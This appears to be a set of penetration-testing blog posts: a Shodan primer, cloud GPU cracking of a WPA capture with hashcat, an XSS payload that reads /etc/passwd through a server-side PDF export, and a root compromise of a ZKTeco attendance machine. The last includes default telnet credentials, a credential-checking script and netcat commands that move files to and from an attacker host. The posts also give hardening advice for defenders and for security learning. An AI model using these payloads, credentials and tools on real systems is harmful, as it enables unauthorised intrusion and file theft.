Shodan Primer

What is Shodan?

There are plenty of web search engines out there. In our day-to-day lives we use the usual ones like Google, Bing or the search box on Wikipedia, which crawl the world wide web and tell us about websites. But have you ever thought about a search engine that searches the devices connected to the internet and tells you about them?

You might have heard of Shodan. Shodan is a search engine for internet-connected devices: anything reachable from the public internet that answers a probe can turn up in it. That includes web servers, IP cameras, smart TVs, smart bulbs and other IoT devices, and even industrial control systems (ICS). You could look up a power plant's exposed controller on Shodan and learn which country and city it is located in. Shodan also records the services running on each device.

That sounds scary straight away, and it should. Imagine an attacker finding your smart TV on Shodan with a telnet service still protected by default credentials. They can get straight into your network, pivot, and gain access to the other devices on it.

Let's learn more about Shodan and how to use it to gather information about a target during a penetration test.

Using Shodan

When Shodan finds a device connected directly to the internet, it queries it for publicly available information. Most of the data Shodan indexes comes from banners: the metadata a service sends back when you connect to it, such as a version string or an HTTP response header.

For example, the following is what we see when connecting to an SSH server. The screenshot actually mixes two things. The banner proper is the pre-authentication version string (the SSH-2.0-... line), which on its own reveals the SSH software version and, here, that the host runs Debian. The 64-bit architecture, the last login time and the IP address that login came from are printed by the message of the day after a successful login. Shodan never authenticates, so only the former ends up in its index.

To be able to make the best use of Shodan, we need to understand the syntax of search. Let’s understand it.

Shodan can be accessed by visiting the URL https://shodan.io.

You can search without logging in, but the results are limited, so it is worth creating a free account.

Filters are used to search for devices having specific properties. Shodan has various filters like city, country, ip, os etc.

The syntax for a filter is filtername:value. Filters go into the search bar at the top of the site, and several can be combined in one query.

For example, to look up devices present in US, one can put in a filter like country:US

A number of results are displayed. Notice how Shodan also breaks them down by top cities, top services, top organizations and so on. Click Download Results to save what you found. Shodan can also create reports that give a visual summary of the results; click Create Report to get one.

You can also click on a particular result to get detailed information regarding it.

The detailed view shows the location, organization and ISP, the list of open ports with the services identified on them, and even vulnerabilities. Awesome, there is a lot of juicy information here. One caveat: the CVEs listed are matched from the version string in the banner, not verified against the host, so treat them as leads to confirm rather than as findings.

To look up devices belonging to the firm "One solutions" in Boston, the query would be org:"One solutions" city:Boston (a value containing spaces must be quoted).

You can find complete list of filters here: https://github.com/JavierOlmedo/shodan-filters

https://maps.shodan.io/ lets you search with an interactive map. Following are the results displayed for the query "tomcat".

https://images.shodan.io/ shows the screenshots from devices crawled by Shodan.

https://exploits.shodan.io/ can be used to search for exploits across multiple vulnerability databases.

We can also look at queries shared by other users. Visit the URL https://www.shodan.io/explore to explore the devices & various services connected to the internet.

For instance, clicking on cams shows various security cameras exposed to the internet.

Visiting one of the host gives the login panel of the IP camera.

Anyone on the internet can reach this login panel. If the default password has not been changed, or a weak one is used, anyone can guess it, log in and view the camera stream.

Real time network monitoring

We can monitor a specified IP or range of IP addresses in real time using Shodan. Whenever a new service is discovered on those IPs, we get a notification. This is very handy for catching services on your own network that should not be exposed.

Visit https://monitor.shodan.io/dashboard and click the Setup Network Monitor button. Next, give it a name and the IP(s) or domain to watch, and choose whether you want to be notified by email.

Save it and you will be shown with Manage Assets interface. This allows you to modify trigger rules.

Triggers send you a notification whenever their condition is met. Say you have enabled the ssl_expired trigger: you will be notified when an SSL certificate on a monitored host expires.

From the Manage Assets interface it’s also possible to scan that particular IP.

Shodan add-on

Shodan also has a Firefox add-on. Once installed in your browser, it shows Shodan's information about the host of whatever website you are visiting.

The add-on is available at https://addons.mozilla.org/en-US/firefox/addon/shodan_io/

As can be seen in the above image, the add-on shows the location of the host and the open ports.

This is very useful in information gathering.

Conclusion

Shodan is a very powerful search engine that can show the metadata of any device/service exposed to the public internet. It is a valuable asset when gathering information about the target. It can be used both for offensive & defensive purposes.

It also provides an API, with official client libraries for several programming languages, which can be used to integrate Shodan into your own tools.
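Here is an added example (my code, not from the original post or from Shodan's own documentation) of what that integration looks like in Python. It builds a query from filters the way the search bar expects, so the org:"One solutions" city:Boston query from the filter section above is produced by build_query, and it summarises a result set the way the web UI's top ports and top organizations panels do. SAMPLE_MATCHES is constructed data with placeholder CVE ids; the only live API call is shodan_search(), which uses the official shodan package and assumes you have an API key. That each match carries a vulns dict keyed by CVE id is an assumption about Shodan's banner format.

```python
"""Added example: Shodan query building and result faceting (not code from the post)."""
from collections import Counter


def build_query(*terms, **filters):
    """Join free-text terms and filter:value pairs into one Shodan query string.

    Values containing whitespace are double-quoted, e.g. org:"One solutions".
    """
    parts = list(terms)
    for name, value in filters.items():
        value = str(value)
        if any(ch.isspace() for ch in value):
            value = f'"{value}"'
        parts.append(f"{name}:{value}")
    return " ".join(parts)


def summarise(matches, top=3):
    """Facet a list of Shodan match dicts like the web UI's 'Top ...' panels.

    Each match is one banner, i.e. one (ip_str, port) pair, so a host with
    several services appears several times and must be de-duplicated.
    """
    hosts = {m["ip_str"] for m in matches}
    ports = Counter(m["port"] for m in matches)
    orgs = Counter(m.get("org") or "unknown" for m in matches)
    # Assumption: 'vulns' is a dict keyed by CVE id when Shodan matched any.
    vulnerable_hosts = {m["ip_str"] for m in matches if m.get("vulns")}
    cves = Counter(cve for m in matches for cve in (m.get("vulns") or {}))
    return {
        "hosts": len(hosts),
        "top_ports": ports.most_common(top),
        "top_orgs": orgs.most_common(top),
        "vulnerable_hosts": len(vulnerable_hosts),
        "top_cves": cves.most_common(top),
    }


def shodan_search(api_key, query, max_pages=1):
    """Live search with the official client (pip install shodan); needs a key and network."""
    import shodan  # imported here so the rest of the file runs offline

    api = shodan.Shodan(api_key)
    matches = []
    for page in range(1, max_pages + 1):
        result = api.search(query, page=page)  # one page is up to 100 banners
        matches.extend(result["matches"])
        if len(matches) >= result["total"]:
            break
    return matches


# Constructed sample in the shape of api.search()["matches"]; the CVE ids are
# placeholders, not real advisories.
SAMPLE_MATCHES = [
    {"ip_str": "203.0.113.10", "port": 22, "org": "Example ISP", "vulns": {}},
    {"ip_str": "203.0.113.10", "port": 8080, "org": "Example ISP",
     "vulns": {"CVE-0000-0001": {}}},
    {"ip_str": "198.51.100.7", "port": 23, "org": "One solutions"},
    {"ip_str": "198.51.100.9", "port": 8080, "org": "One solutions",
     "vulns": {"CVE-0000-0001": {}}},
]

if __name__ == "__main__":
    print(build_query("tomcat", org="One solutions", city="Boston"))
    for key, value in summarise(SAMPLE_MATCHES).items():
        print(f"{key}: {value}")
```

To run it against live data, call summarise(shodan_search(key, build_query(org="One solutions", city="Boston"))); page through more results only as far as your plan's query credits allow.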

The free Shodan account provides limited search features. If you are going to use Shodan a lot, the paid membership is worth the investment.

As we saw, it is easy for an attacker to look up any device via Shodan and check its exposed services. The flip side is that you can point the same monitoring at your own network and enable the triggers, so that whenever a new service is exposed to the internet, Shodan notifies you.

Cracking passwords on the go over cloud cheaply

Hello friends! During penetration tests, CTFs or a wireless assessment you often come across a situation where you need to crack hashes. If your system does not have a good GPU, you have surely wished for a powerful one that would crack the hash in moments. Even with a decent GPU you need proper cooling to run it for hours, because sustained heat throttles and wears out the card.

Did it ever occur to you if all of the cracking process could be handed over to cloud and you can just sit back and relax ?!

Yes! It is indeed possible, and at a far lower cost than you might imagine.

For this tutorial we will use the Azure cloud. If you are a student, Microsoft Azure provides $100 in credit, which you can use to get a virtual machine in the cloud.

As you are probably aware, cracking hashes on a GPU is far faster than on a CPU. Azure offers VMs for various purposes; the N-series VMs come with Nvidia GPUs and can be used to crack hashes on demand.

Now you might think that a VM in the cloud, and one with a GPU at that, must have a sky-high price. The following price estimate is a pleasant surprise. The monthly price of the machine is quite high, but we only need it for the few hours it takes to crack the password or hash, so it is quite affordable.

I chose the NC6 Promo instance in the Azure price calculator. The price for 2 hours comes to just $0.95. Not even a full dollar! (Prices and the availability of promo sizes change, so check the calculator for current figures.)

Let’s go step by step how to setup VM in cloud from scratch and set everything up.

First, you must either have the Azure credits mentioned above or add a credit card. Log in with your Microsoft account at https://portal.azure.com

After logging in, go to Virtual Machines > Create a Virtual Machine.

You will be presented with various options for the VM configuration. Under Resource group, select one you created previously, or create a new one and choose it. Next, give the virtual machine a name. Choose a region, or keep the default. Under Image, choose Ubuntu 16.04 LTS (the CUDA repository package used below is the 16.04 one; if you pick Ubuntu 18.04 LTS, use the matching ubuntu1804 repository instead). Under Size, select Standard NC6 Promo.

You can log in with a password or, preferably, an SSH key; set the options accordingly. In the Management tab, turn off boot diagnostics. Leave the other options as they are and press the Review + Create button.

It will take some time for the VM to be deployed. Get yourself a cup of coffee meanwhile and relax.

After the VM is deployed, log in with SSH and check that the Nvidia card is visible with the following command.

lspci | grep -i NVIDIA

Now we need to install the CUDA drivers. Run the following commands in order.

CUDA_REPO_PKG=cuda-repo-ubuntu1604_10.0.130-1_amd64.deb
wget -O /tmp/${CUDA_REPO_PKG} http://developer.download.nvidia.com/compute/cuda/repos/ubuntu1604/x86_64/${CUDA_REPO_PKG}
sudo dpkg -i /tmp/${CUDA_REPO_PKG}
sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1604/x86_64/7fa2af80.pub
rm -f /tmp/${CUDA_REPO_PKG}
sudo apt-get update
sudo apt-get install cuda-drivers

If the apt-key command fails with an error like the one shown below, the usual workaround is to change https to http in its URL. Be aware of what that does: the repository signing key is then fetched over plaintext, so anyone on the path could substitute their own key and the later apt-get install would accept their packages. If you go that way, at least run apt-key list afterwards and check that the key you imported carries the ID 7FA2AF80 that appears in the file name.

The installation takes a while. Once it has finished, reboot the machine with sudo reboot.

Reconnect to the VM over SSH once it is back up and run nvidia-smi to check that the drivers were installed successfully. If you get output like the following, you are good to go.

Next, we need to install everyone's favourite hash-cracking tool, hashcat. Use the following commands to fetch and compile it (install git and build-essential first if the image does not have them).

git clone https://github.com/hashcat/hashcat.git

cd hashcat

make

Running the WPA2 benchmark with ./hashcat --benchmark -m 2500 shows a cracking speed of 85765 H/s. Awesome! (If you built a recent hashcat, 6.0 or later, mode 2500 is deprecated in favour of -m 22000, which takes the hc22000 format instead of hccapx.)

Now we will try to crack the password from a .cap file captured from a WiFi access point. To crack it with hashcat, the capture must first be converted to hccapx (or, for -m 22000, to hc22000 with hcxpcapngtool). You can do that here, or offline with cap2hccapx from hashcat-utils.

You also need a wordlist for a dictionary attack. Download rockyou.txt with the following command. This is a third-party mirror; Kali ships the same list at /usr/share/wordlists/rockyou.txt.gz, and either way check that the file has roughly 14.3 million lines before relying on it.

wget https://www.scrapmaker.com/data/wordlists/dictionaries/rockyou.txt

Once the list is downloaded, you can pass following command to start cracking it. Replace file.hccapx with the name of your own hccapx file.

./hashcat -m 2500 file.hccapx rockyou.txt

The estimated time is nearly 3 minutes. The whole of rockyou.txt can be tested in just 3 minutes! Mind-blowing!

And voilà! In just over a minute the password was cracked.

If the password is not cracked by rockyou.txt alone, add a rule file as follows.

./hashcat -m 2500 file.hccapx rockyou.txt -r rules/best64.rule

best64 applies a few dozen mangling rules (case toggles, appended digits, reversals and so on) to every word, so the keyspace grows by that factor. At this speed the run takes around 4 hours, which is still reasonable; the same command would take about a day on an average system. Another advantage is that you can leave it running in the cloud (start it inside tmux or screen, or with nohup, so it survives your SSH session ending, and give it a --session name so --restore can resume it), go about your day, and come back later to see whether it cracked.
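To sanity-check those timings, here is an added Python helper (my code, not from the post) that reads the speed out of hashcat's benchmark line and turns a wordlist size, rule count and speed into the time needed to exhaust the keyspace and what the VM costs for that long. The benchmark line format, the rockyou.txt line count (14,344,392) and the best64 rule count (77) are assumptions taken from typical copies, so check yours with wc -l. At 85765 H/s it reproduces the post's figures: under three minutes for rockyou.txt alone and about 3.6 hours with best64.

```python
"""Added example: estimate cracking time and cloud cost from a hashcat benchmark."""
import re

# Typical values; verify with `wc -l rockyou.txt` and `wc -l rules/best64.rule`.
ROCKYOU_WORDS = 14_344_392
BEST64_RULES = 77
NC6_PROMO_USD_PER_HOUR = 0.95 / 2        # the post's estimate: $0.95 for two hours

# Matches lines like "Speed.#1.........:    85765 H/s (98.20ms) @ Accel:64 ..."
# as printed by hashcat --benchmark (format assumed; adjust if yours differs).
SPEED_LINE = re.compile(r"Speed\.#\d+\.*:\s*([\d.]+)\s*([kMG]?)H/s")
UNIT = {"": 1, "k": 1e3, "M": 1e6, "G": 1e9}


def parse_speed(benchmark_output: str) -> float:
    """Total hashes per second across all Speed.#N lines of a benchmark report."""
    total = 0.0
    for number, unit in SPEED_LINE.findall(benchmark_output):
        total += float(number) * UNIT[unit]
    if total == 0:
        raise ValueError("no Speed.#N line found in benchmark output")
    return total


def seconds_to_exhaust(words: int, speed_hps: float, rules: int = 1) -> float:
    """Worst case: every word, with every rule applied to it, has to be tried."""
    return words * rules / speed_hps


def cost_usd(seconds: float, usd_per_hour: float) -> float:
    """Cost of keeping the VM up for that long, rounded to cents."""
    return round(seconds / 3600 * usd_per_hour, 2)


def plan(speed_hps: float, words: int = ROCKYOU_WORDS, rules: int = 1,
         usd_per_hour: float = NC6_PROMO_USD_PER_HOUR) -> dict:
    """Keyspace, wall-clock time and cost for one wordlist/rule combination."""
    secs = seconds_to_exhaust(words, speed_hps, rules)
    return {"keyspace": words * rules, "seconds": secs,
            "hours": secs / 3600, "cost_usd": cost_usd(secs, usd_per_hour)}


# Constructed benchmark excerpt in hashcat's format, using the post's figure.
SAMPLE_BENCHMARK = """Hashmode: 2500 - WPA-EAPOL-PBKDF2 (Iterations: 4095)

Speed.#1.........:    85765 H/s (98.20ms) @ Accel:64 Loops:64 Thr:1024 Vec:1
"""

if __name__ == "__main__":
    speed = parse_speed(SAMPLE_BENCHMARK)
    for label, rules in (("rockyou.txt", 1), ("rockyou.txt + best64", BEST64_RULES)):
        p = plan(speed, rules=rules)
        print(f"{label}: {p['keyspace']:,} candidates, "
              f"{p['hours']:.2f} h, about ${p['cost_usd']:.2f}")
```

Feed parse_speed the real output of ./hashcat --benchmark -m 2500 (or -m 22000 on a current build) and the estimate applies to your own VM; the ratio between the rule run and the plain run is what tells you whether a larger rule set is worth the hours.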

In this way you can crack passwords on the go from anywhere. Happy cracking! 😀

Local File Read Access through XSS in Dynamically Generated Email Template PDF

Hello friends! I am sure you have come across some interesting and strange vulnerabilities during your penetration tests. Here is one we came across recently.

While testing a web application at eSecurify labs we found an unusual vulnerability.
The application had templates that could be edited as required. The template editor, however, allowed JavaScript to run, and we exploited that to fetch sensitive files from the server.

Security test flow

To begin with, the template editor was tested to check whether it allowed JavaScript to run. We used the payload <img src=x onerror=document.write('aaaa')>, a very common probe for JavaScript execution.

On saving the changes to the template the code was executed and its output “aaaa” was reflected to the template. So far, so good.

Since the code was executing, we wondered whether this could be exploited to fetch sensitive contents from the server and bring them into the web panel. That would be a critical vulnerability: anything on the server readable by the process executing our code could be read.

We spent a lot of time designing a working payload. After a full day's effort, the final payload gave satisfying results.
An XMLHttpRequest was used to request the path file:///etc/passwd and see whether the contents of the passwd file would be revealed.

The following payload was used:
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

With the above payload in the template editor, saving the template succeeded, but no output was shown and no error was thrown either. This suggested the script was being stored unchanged and executed somewhere we could not see; the job now was to find where the output went.

One noteworthy thing: there was an option to download the template as a PDF. That seemed interesting. Maybe it contained /etc/passwd?
When we downloaded the template and opened it, it indeed contained the contents of /etc/passwd!

Next, the contents of /etc/hosts were fetched with the same payload, providing the path of the hosts file like this.
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/hosts");x.send();</script>

This way any file on the server that the PDF renderer's process could read could be fetched: a local file read reached through the export function, which we called export injection.

The Problem

In the given scenario, output encoding was used to prevent XSS. The script we injected was stored unchanged in the database, and whenever it was rendered on a web page, output encoding stopped it from executing. When the same content was requested by the server-side PDF engine, however, the application handed over the raw, unsanitized template, and the engine (a headless browser) executed the script with JavaScript enabled and file:// access allowed. So the "XSS" never ran in a victim's browser; it ran on the server, which is why it could read /etc/passwd.

Prevention Strategy

To prevent attacks like this, the HTML must be made safe before it reaches the PDF engine, not only before it reaches a browser: sanitize the stored template against an allowlist of tags and attributes and feed the same sanitized HTML to both outputs. Strict input sanitization is awkward here because users must be able to design their templates, which is exactly why an allowlist beats a blacklist.

Blacklisting tags like <script> and <iframe> helps a little, but it would not have stopped our very first payload, which used an <img> tag with an onerror handler. Independently of the sanitizer, configure the PDF engine with JavaScript and local file access disabled (wkhtmltopdf, for instance, has --disable-javascript and --disable-local-file-access) and run it as a low-privilege user, so that even a sanitizer bypass reads nothing sensitive.
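As an added illustration (my code, not the tested application's), here is what "one allowlist for both outputs" looks like in Python, next to the two behaviours the application actually had. web_view_html is the output encoding that kept the browser safe, pdf_html_vulnerable is the raw hand-off to the PDF engine, and sanitize_template is the allowlist that should feed both paths. The allowed tags and attributes are an assumption about what a template author needs; the payloads run through it are the two from this post.

```python
"""Added example: allowlist sanitiser shared by the web view and the PDF export."""
import html
from html.parser import HTMLParser

# What a template author legitimately needs (assumed for this example).
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "h1", "h2", "h3",
                "ul", "ol", "li", "table", "thead", "tbody", "tr", "th", "td",
                "div", "span", "img", "a"}
VOID_TAGS = {"br", "img"}
# Elements whose content must go too, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "svg", "math"}
ALLOWED_ATTRS = {"img": {"src", "alt", "width", "height"},
                 "a": {"href", "title"},
                 "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"}}
URL_ATTRS = {"src", "href"}
SAFE_SCHEMES = ("http://", "https://")   # no file://, javascript:, data: or relative paths


class TemplateSanitizer(HTMLParser):
    """Re-emits only allow-listed tags and attributes; everything else is dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._drop_depth = 0   # > 0 while inside <script>, <iframe>, ...

    def handle_starttag(self, tag, attrs):
        if self._drop_depth:
            if tag in DROP_WITH_CONTENT:
                self._drop_depth += 1          # nested dropped element
            return
        if tag in DROP_WITH_CONTENT:
            self._drop_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return                             # unknown tag: drop it, keep its text
        kept = []
        for name, value in attrs:
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                continue                       # event handlers, anything not listed
            value = (value or "").strip()
            if name in URL_ATTRS and not value.lower().startswith(SAFE_SCHEMES):
                continue                       # rejects file:///etc/passwd, javascript:
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._drop_depth:
            if tag in DROP_WITH_CONTENT:
                self._drop_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize_template(raw: str) -> str:
    """The one function both the web renderer and the PDF exporter should call."""
    parser = TemplateSanitizer()
    parser.feed(raw)
    parser.close()
    return "".join(parser.out)


def web_view_html(stored: str) -> str:
    """What the tested app did for the browser: encode everything (safe, but it also
    means the template cannot contain any markup at all)."""
    return html.escape(stored)


def pdf_html_vulnerable(stored: str) -> str:
    """What it did for the PDF engine: hand over the stored template untouched."""
    return stored


# The two payloads from this post.
PROBE = "<img src=x onerror=document.write('aaaa')>"
FILE_READ = ('<script>x=new XMLHttpRequest;x.onload=function(){document.write('
             'this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>')

if __name__ == "__main__":
    for payload in (PROBE, FILE_READ):
        print("web view :", web_view_html(payload))
        print("pdf (bad):", pdf_html_vulnerable(payload))
        print("sanitised:", repr(sanitize_template(payload)))
```

The sanitizer drops the probe's onerror handler and the whole script element, and it also refuses any src or href that is not http(s), which is what blocks file:// and javascript: URLs in the tags that are allowed. Run the sanitized output through the PDF engine, never the stored original, and still disable JavaScript and local file access in the engine as a second layer.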

Final Words

If you come across similar functionality where JavaScript executes and a PDF can be generated, be sure to test for this vulnerability. Adios and happy hacking!

Hacking ZKTeco K40Pro (ZEM510) IoT Device

Hello Friends,

What is the very first thought that comes to your mind when you see an attendance machine?

Whether you are a student or a professional, the first thought is usually "why me?". Was there even a need for office attendance machines? The one thing that follows us like our shadow is not a soul mate or twin flame but this attendance machine. Relax: IoT devices can often be hacked in minutes, and today we are going to hack one such device, a ZKTeco office attendance machine.

Welcome to the realm of hacking. The future of hacking lies in IoT: just as the internet connects people, the Internet of Things connects devices and helps them communicate.

Today we will gain access to this attendance machine and change its normal behaviour.

IoT Hacking -ZKTeco Office Attendance Machine by Dhaiwat under guidance of Smit Sir

So, let's find out whether this "smart" device is actually smart. 😉 In just ten simple steps, yes, ten, we will get into the system and its smartness will take a hit. 😀

The first step is to scan the network and find the IP of the device. You can use nmap or Zenmap; here we use nmap. The attacker's IP is 192.168.1.58 and the victim's IP is 192.168.1.101.

Now we port-scan the victim. Port scanning finds the open ports, which tell us what to target.

Command: nmap -sV -p- 192.168.1.101 (victim's IP)

The output shows that the telnet port, port 23, is open.

In the second step we try to connect over telnet using default passwords.

Here is the list of telnet default credentials (user:password) we tried. 😉

admin:admin
888:manage
manage:888
asp:test
888:asp

The combination that worked for us was root:solokey.
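Here is an added Python version of step two (my code, not from the post and not a ZKTeco tool). It tries each pair from the list above plus root:solokey on a fresh telnet connection, refusing every telnet option so the device just shows its login prompt, and reports which pair yields a shell. The prompt patterns (login:, Password:, a trailing # or $) and the FakeDevice used to exercise it offline are assumptions modelled on a typical BusyBox login; the real transport is SocketConn.

```python
"""Added example: telnet default-credential check with a swappable transport."""
import re
import socket

# The pairs tried in the post, plus the one that worked on this device.
DEFAULT_CREDS = [("admin", "admin"), ("888", "manage"), ("manage", "888"),
                 ("asp", "test"), ("888", "asp"), ("root", "solokey")]

# Prompt patterns assumed from a typical BusyBox login (adjust for other devices).
LOGIN_PROMPT = re.compile(rb"login: ?$", re.I)
PASS_PROMPT = re.compile(rb"password: ?$", re.I)
SHELL_PROMPT = re.compile(rb"[#$] ?$")
FAILURE = re.compile(rb"incorrect|denied|failed", re.I)

IAC, DONT, DO, WONT, WILL = 255, 254, 253, 252, 251


class SocketConn:
    """Real transport: a TCP socket with telnet option negotiation refused."""

    def __init__(self, host, port=23, timeout=5.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)

    def write(self, data):
        self.sock.sendall(data)

    def read_some(self):
        raw, out, i = self.sock.recv(4096), bytearray(), 0
        while i < len(raw):
            if raw[i] == IAC and i + 2 < len(raw) and raw[i + 1] in (DO, WILL, DONT, WONT):
                cmd, opt = raw[i + 1], raw[i + 2]
                if cmd in (DO, WILL):          # refuse every option offered or requested
                    self.write(bytes([IAC, WONT if cmd == DO else DONT, opt]))
                i += 3
            else:
                out.append(raw[i])
                i += 1
        return bytes(out)

    def close(self):
        self.sock.close()


def read_until(conn, patterns, max_reads=32):
    """Read until the output's tail matches one of the patterns; returns (index, buf)."""
    buf = b""
    for _ in range(max_reads):
        chunk = conn.read_some()
        if not chunk:
            break
        buf += chunk
        for i, pat in enumerate(patterns):
            if pat.search(buf[-128:]):
                return i, buf
    return None, buf


def try_login(conn, user, password):
    """One attempt on an open connection; True if a shell prompt appears."""
    if read_until(conn, [LOGIN_PROMPT])[0] is None:
        return False
    conn.write(user.encode() + b"\r\n")
    hit = read_until(conn, [PASS_PROMPT, FAILURE, SHELL_PROMPT])[0]
    if hit == 2:
        return True                  # account with no password at all
    if hit != 0:
        return False
    conn.write(password.encode() + b"\r\n")
    return read_until(conn, [FAILURE, LOGIN_PROMPT, SHELL_PROMPT])[0] == 2


def find_default_credential(connect, creds=DEFAULT_CREDS):
    """Try each pair on a fresh connection; many devices drop the session after a failure."""
    for user, password in creds:
        conn = connect()
        try:
            if try_login(conn, user, password):
                return user, password
        except OSError:              # timeouts and resets count as failures
            pass
        finally:
            conn.close()
    return None


class FakeDevice:
    """Constructed stand-in for the machine's telnet daemon, for offline testing only."""

    def __init__(self, user, password):
        self.creds, self.user, self.awaiting_password = (user, password), None, False
        self.pending = b"\r\nZEM510 login: "

    def read_some(self):
        out, self.pending = self.pending, b""
        return out

    def write(self, data):
        line = data.decode().strip()
        if not self.awaiting_password:
            self.user, self.awaiting_password, self.pending = line, True, b"Password: "
        else:
            ok = (self.user, line) == self.creds
            self.pending = b"\r\n# " if ok else b"\r\nLogin incorrect\r\nZEM510 login: "
            self.awaiting_password = False

    def close(self):
        pass


if __name__ == "__main__":
    print(find_default_credential(lambda: SocketConn("192.168.1.101")))
```

Only run the live version against devices you are authorised to test; the same function, pointed at the IP found in step one, replaces typing each pair by hand.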

The third step is to check our privileges.

Command to check the current user: id

The output shows that we are root.

In the fourth step we look at the running processes for one that is useful to us.

Command: ps

Among the running processes we found an unusual one: /mnt/mtdblock/main

The fifth step is to go into /mnt/mtdblock.

It holds several configuration files, and options.cfg looks like the main one. What are we waiting for? Let's dig into it.

Command: cat options.cfg

The sixth step is to read through the configuration file. options.cfg is important for us: it contains some public IPs, ports and user configuration.

It's time to play.

Command: cd wav
ls

In the seventh step we find the wav sound files. These will help us change the behaviour of the smart machine.

Now we pull E_0.wav, the monotonous "Thank you" sound, over to the attacker's system with netcat. Netcat only moves raw bytes, so the listener's output has to be redirected into a file. Start the listener on the attacker's system on port 4444:

Command: ncat -lvnp 4444 > E_0.wav

Let's get rid of this boring "Thank you" sound and play with the machine! 😉

In the eighth step we send the file from the victim to the attacker. On the victim, run the following, giving E_0.wav as the input:

nc 192.168.1.58 4444 < E_0.wav

The file is now on the attacker's machine. Check that it arrived intact with ls -l: netcat gives no confirmation that a transfer completed, so compare the size on both ends (and, if the device's busybox has md5sum, the checksum too).

In step nine we generate a custom wav file. Use a free online text-to-speech site to generate a wav from text and rename it E_0.wav (keep the same audio format as the original, or the device may refuse to play it). Keep a copy of the original so you can restore it, then remove it from the victim with rm. Now start a netcat listener on the victim on port 4444 and save its output into the wav file:

Command: nc -lp 4444 > E_0.wav

The tenth and final step is to send our new E_0.wav to the victim with:

ncat 192.168.1.101 4444 < E_0.wav

The custom wav file is now on the victim's machine. And bingo, we have changed the sound of the attendance machine.

Impact of the IoT device hacking

  • In this case we get root directly, which means full control over the device.
  • A foothold on a so-called smart device (a camera, an attendance machine, a smart TV) puts the attacker inside the LAN, from where the router's admin interface is reachable and can be attacked in turn, for example through default or weak credentials or by cracking captured password hashes.
  • Once the attacker controls the router, the whole network is under their control.

Solution to keep intruders away

  • If you use this device at your school, university or workplace, change the default telnet password. Better still, disable telnet if the device allows it, never expose the device to the internet, and put such devices on their own network segment so that a compromised one cannot reach the rest of the LAN.

Note: This is for educational purposes only. Using it against systems you are not authorised to test can land you in legal trouble. Always choose to learn and help others rather than commit a felony.